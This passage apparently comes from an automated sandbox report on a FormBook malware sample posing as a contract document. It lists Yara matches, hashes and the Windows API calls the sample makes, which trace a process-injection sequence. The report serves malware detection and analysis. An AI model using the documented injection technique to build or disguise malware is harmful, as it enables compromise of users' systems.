                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4137334870.0000000005270000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:9
                                                                                                                      Start time:04:17:57
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true


                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:2.9%
                                                                                                                        Total number of Nodes:209
                                                                                                                        Total number of Limit Nodes:19
28377->28376 28378 791e6e0 WriteProcessMemory 28377->28378 28379 791e6e8 WriteProcessMemory 28377->28379 28378->28377 28379->28377 28381 b950243 28380->28381 28435 791e7d8 28381->28435 28439 791e7d3 28381->28439 28382 b9509f5 28386 b9501c2 28385->28386 28387 b9508fe 28386->28387 28388 791e6e0 WriteProcessMemory 28386->28388 28389 791e6e8 WriteProcessMemory 28386->28389 28387->28264 28388->28386 28389->28386 28391 791e15d Wow64SetThreadContext 28390->28391 28393 791e1a5 28391->28393 28393->28310 28395 791e15d Wow64SetThreadContext 28394->28395 28397 791e1a5 28395->28397 28397->28310 28399 791e9f9 CreateProcessA 28398->28399 28401 791ebbb 28399->28401 28403 791e9f9 CreateProcessA 28402->28403 28405 791ebbb 28403->28405 28407 791e06b ResumeThread 28406->28407 28408 791e00a 28406->28408 28410 791e0d9 28407->28410 28408->28320 28410->28320 28412 791e06b ResumeThread 28411->28412 28414 791e0d9 28412->28414 28414->28320 28416 791e06b ResumeThread 28415->28416 28418 791e0d9 28416->28418 28418->28320 28420 791e628 VirtualAllocEx 28419->28420 28422 791e6a5 28420->28422 28422->28357 28424 791e668 VirtualAllocEx 28423->28424 28426 791e6a5 28424->28426 28426->28357 28428 791e6e8 WriteProcessMemory 28427->28428 28430 791e787 28428->28430 28430->28362 28432 791e730 WriteProcessMemory 28431->28432 28434 791e787 28432->28434 28434->28362 28436 791e823 ReadProcessMemory 28435->28436 28438 791e867 28436->28438 28438->28382 28440 791e823 ReadProcessMemory 28439->28440 28442 791e867 28440->28442 28442->28382 28177 b950ed0 28178 b95105b 28177->28178 28179 b950ef6 28177->28179 28179->28178 28181 b951181 PostMessageW 28179->28181 28182 b9511bc 28181->28182 28182->28179 28183 7913818 28185 791383c 28183->28185 28186 7913414 28185->28186 28187 7914158 OutputDebugStringW 28186->28187 28189 79141d7 28187->28189 28189->28185 28195 172d418 28196 172d45e GetCurrentProcess 28195->28196 28198 172d4b0 GetCurrentThread 28196->28198 28199 172d4a9 28196->28199 28200 172d4e6 28198->28200 28201 172d4ed 
GetCurrentProcess 28198->28201 28199->28198 28200->28201 28204 172d523 28201->28204 28202 172d54b GetCurrentThreadId 28203 172d57c 28202->28203 28204->28202 28190 791399a 28191 79138d4 28190->28191 28192 7913414 OutputDebugStringW 28191->28192 28192->28191
                                                                                                                        APIs
                                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07912DC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1778838933-0
                                                                                                                        • Opcode ID: c566fa4d3ca580a3a517d113f1a4b60e7bde6d8a607f497ec8decf9d50b5e1de
                                                                                                                        • Instruction ID: 4aef98d84e0283ed8b19724b430d93c043302d5889cf40df9b3f383969c7b8c5
                                                                                                                        • Opcode Fuzzy Hash: c566fa4d3ca580a3a517d113f1a4b60e7bde6d8a607f497ec8decf9d50b5e1de
                                                                                                                        • Instruction Fuzzy Hash: B821EDB6D00259DFCB10DF9AD884ADEBBF4FB48314F10842AE968A7210D374A954CFA4
                                                                                                                        APIs
                                                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07912DC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1778838933-0
                                                                                                                        • Opcode ID: 3eed47768104f566eb17e55a8966635fa867834811aabc9f5b94ebfc6ae02556
                                                                                                                        • Instruction ID: e1ca021ccabb6b33546e9ae34a53503f2c503aa85e4893ea0add306f0750f9ea
                                                                                                                        • Opcode Fuzzy Hash: 3eed47768104f566eb17e55a8966635fa867834811aabc9f5b94ebfc6ae02556
                                                                                                                        • Instruction Fuzzy Hash: 3421BFB6900359DFCB10DF9AD884ADEBBF4FB48314F10842AE958A7250C375A554CFA5

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 294 172d409-172d4a7 GetCurrentProcess 298 172d4b0-172d4e4 GetCurrentThread 294->298 299 172d4a9-172d4af 294->299 300 172d4e6-172d4ec 298->300 301 172d4ed-172d521 GetCurrentProcess 298->301 299->298 300->301 302 172d523-172d529 301->302 303 172d52a-172d545 call 172d5e8 301->303 302->303 307 172d54b-172d57a GetCurrentThreadId 303->307 308 172d583-172d5e5 307->308 309 172d57c-172d582 307->309 309->308
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D496
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0172D4D3
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D510
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0172D569
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: 2e29c1336921641c246ef89fe9686352bcb70642d08b02fc96973d830ea5ae5c
                                                                                                                        • Instruction ID: a1afe4191a19739eb6b1364fbf1d6c22d577b20c17963846e0f824cdd4c3f10a
                                                                                                                        • Opcode Fuzzy Hash: 2e29c1336921641c246ef89fe9686352bcb70642d08b02fc96973d830ea5ae5c
                                                                                                                        • Instruction Fuzzy Hash: 9C5146B0900249CFDB18DFA9D5487DEBBF1BB48314F208459E419A73A0DB74A945CB65

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D496
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0172D4D3
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0172D510
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0172D569
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0

                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0791EBA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0

                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0791EBA6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0

                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 017259C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0

                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 017259C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0

                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0791E778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0

                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0791E778
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 656 791e7d3-791e865 ReadProcessMemory 659 791e867-791e86d 656->659 660 791e86e-791e89e 656->660 659->660
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0791E858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 646 791e110-791e163 648 791e173-791e1a3 Wow64SetThreadContext 646->648 649 791e165-791e171 646->649 651 791e1a5-791e1ab 648->651 652 791e1ac-791e1dc 648->652 649->648 651->652
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0791E196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0172D6E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0791E858
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0791E196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0172D6E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0791E696
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0791E696
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        APIs
                                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 079141C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugOutputString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1166629820-0
                                                                                                                        APIs
                                                                                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 079141C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DebugOutputString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1166629820-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B9511AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1772387333.000000000B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B950000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_b950000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • Opcode Fuzzy Hash: d5c1960196a7c6e08390a2eb937f5c1c04e431c53b5a0775cde812dd4330035e
                                                                                                                        • Instruction Fuzzy Hash: 9BE1E7B4E401198FCB14CFA9C9809AEFBF6FF89304F248169E815AB356D734A941CF61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 282cc721e960ee41109543561e445c5d40a795698a3919c9e203e0ea349da86c
                                                                                                                        • Instruction ID: c05c1aeb2d659b74d6adb971f37519bc6bc46bf5bb2477c55a3fa3899465d640
                                                                                                                        • Opcode Fuzzy Hash: 282cc721e960ee41109543561e445c5d40a795698a3919c9e203e0ea349da86c
                                                                                                                        • Instruction Fuzzy Hash: 0BE1F9B4E101198FCB14DFA9C5809AEFBB2FF89304F248569E815AB356D735AD41CFA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c7d05470781a28891bdad83c900656ad088eeeb00b6a160e10313729f7fff7df
                                                                                                                        • Instruction ID: 1df67122ce02528ff15643e6aa826d50d2009f4c314035384061573fd10e09f0
                                                                                                                        • Opcode Fuzzy Hash: c7d05470781a28891bdad83c900656ad088eeeb00b6a160e10313729f7fff7df
                                                                                                                        • Instruction Fuzzy Hash: 04E10AB4E101198FCB14DFA9C5809AEFBB2FF89304F248169E915AB356D735AD41CFA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 250fa5600a899ce5ad83d6e0ff5a847fd371fcd1bdaf25e1a63956640bd4c5e3
                                                                                                                        • Instruction ID: e18655ff71a51cc9940f3cf9d62d63e8daf25d186991913a5a7235e5f488dceb
                                                                                                                        • Opcode Fuzzy Hash: 250fa5600a899ce5ad83d6e0ff5a847fd371fcd1bdaf25e1a63956640bd4c5e3
                                                                                                                        • Instruction Fuzzy Hash: AEA19132E10229CFCF15DFB4C94499EFBB2FF84300B15856AE901AB265DB75E946CB40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 02b0e1a03356542fa13400ae0a388558351121bc224b8022a4376a28b734df5a
                                                                                                                        • Instruction ID: 59d854589ce6837a283d34469365a2d8c8575d89aea13e8696cd069aba63926d
                                                                                                                        • Opcode Fuzzy Hash: 02b0e1a03356542fa13400ae0a388558351121bc224b8022a4376a28b734df5a
                                                                                                                        • Instruction Fuzzy Hash: F67192B5E012198FCB04DFAAC5845DEFBF2BF88300F25D56AE418AB255DB34A942CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8faddb423bff1660a1156331628d526732bedece7bf2372aa6b32c55824071d6
                                                                                                                        • Instruction ID: ac8d3d17e7702ece28e8b736827c66d7b3e81f88d9c65e55ebdf25a53e5788d0
                                                                                                                        • Opcode Fuzzy Hash: 8faddb423bff1660a1156331628d526732bedece7bf2372aa6b32c55824071d6
                                                                                                                        • Instruction Fuzzy Hash: 21513BB4E1021A8BCB14CFA9C9805AEFBF2FF89304F24C169D518A7356D735A941CFA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 82c3b243b4e304804b64b48d61ffaae5aa198e8b2d21f6098d7a716299fce156
                                                                                                                        • Instruction ID: b732d326d54f67a04cfbcc20b66949888b590fc733ee552baa965c0a9e90acf4
                                                                                                                        • Opcode Fuzzy Hash: 82c3b243b4e304804b64b48d61ffaae5aa198e8b2d21f6098d7a716299fce156
                                                                                                                        • Instruction Fuzzy Hash: 2A5184B5E006598FDB08DFAAD98469EFBF2BF88300F15C52AD819AB354DB345946CF40

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:5%
                                                                                                                        Signature Coverage:4.3%
                                                                                                                        Total number of Nodes:139
                                                                                                                        Total number of Limit Nodes:9

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                        • Instruction ID: 83a4faa08aeb9e0cc7d1d2cc38f7fda52d0d200c19248de9a3f1e8e19a1a9c74
                                                                                                                        • Opcode Fuzzy Hash: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                        • Instruction Fuzzy Hash: AD015EB1E4420DBBDB10DBE1DC42FDEB378AB54308F4041AAE90897241F635EB488B95
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C37A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction ID: 81410ffb0874c72c9f82fd140613efc6d021da64afe04e32bc0b3bf2b0fa7c57
                                                                                                                        • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction Fuzzy Hash: 16E04F362102147BD510FA5ADC01F9B779CEFC5714F40841AFA0967141C674B90287B5
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
